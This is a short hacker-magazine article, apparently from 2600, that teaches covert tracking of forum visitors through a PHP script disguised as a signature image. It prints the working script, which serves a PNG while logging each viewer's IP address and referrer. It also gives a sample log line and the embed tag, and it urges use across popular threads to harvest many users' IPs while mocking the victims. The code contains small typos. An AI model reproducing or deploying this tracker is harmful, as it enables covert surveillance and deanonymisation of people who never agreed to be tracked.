Tracking Users on Trustworthy Sources

by xnite (xnite@xnite.org)

When people think about hiding their IP address, they never stop to think who other than a website administrator has access to it.  In reality, there are many trustworthy websites that we can exploit to obtain information on its visitors.  In this piece, I will focus primarily on forums , because it is something I'm a bit more familiar with.  But I'm sure you will find your own ways of doing things.

You may think it is safe to visit Ubuntu Forums or IRCForum without a proxy and the only people who will have a record of your IP are the forum admins.  Think again!  I took the 15 minutes out of my day to throw together a quick proof-of-concept for you guys and I think you will really enjoy.

So I've been a member of a couple of different forums, and time after time some troll will pop-up on my radar replying to my threads.  If your thread is fairly inactive, then this may be an easy way to track the troll down on the Internet, otherwise maybe not so much.

<?php
header("Content-type: image/png");
echo file_get_contents('./rawimage.png');
$fh = fopen('forumlog.txt', 'a');
fwrite($fh, "".date(r).":Forum: ".$_GET[id]." | ".$_SERVER['HTTP_REFERER']." = | IP: ".$SERVER['REMOTE_ADDR']."\n" );
fclose($fh);
?>

What this piece of PHP code is doing is serving a PNG image file, rawimage.png, to a visitor while storing their data in the log file which is put out as forumlog.txt.  The URL to this script can be set as your forum signature image, and the ID variable in the URL can be used to mark which forum a line of logs is coming from.

The output in the log file will look a lot like the line below:

Sun, 16 Sep 2012 01:07:34 - 0600: Forum: forum | http://forum.tld/thread.php?id=1234567&page=2 | IP: 123.45.67.89

As mentioned previously, you can label each forum that you use your signature on by using a tag much like the following:

[IMG]http://yourdomain.tld/forumsig.php?id=NameOfForum[/IMG]

Anyone who visits a thread where your signature is shown will be logged into the log file, so in theory you could use this on a place such as Hack Forums to post in various popular threads and gain the IP addresses of many forum users, which couldn't be good!

This sort of information gathering is rather hard to prevent, as most people would not suspect that clicking on a link to Ubuntu Forums or Linux Forums, for example, could be potentially harmful.  Since we use no JavaScript to carry out our attack, it cannot really be disabled either.  The victim just needs to kind of bend over and take it.

At any rate, have fun with this, and try not to abuse it too much.
Return to $2600 Index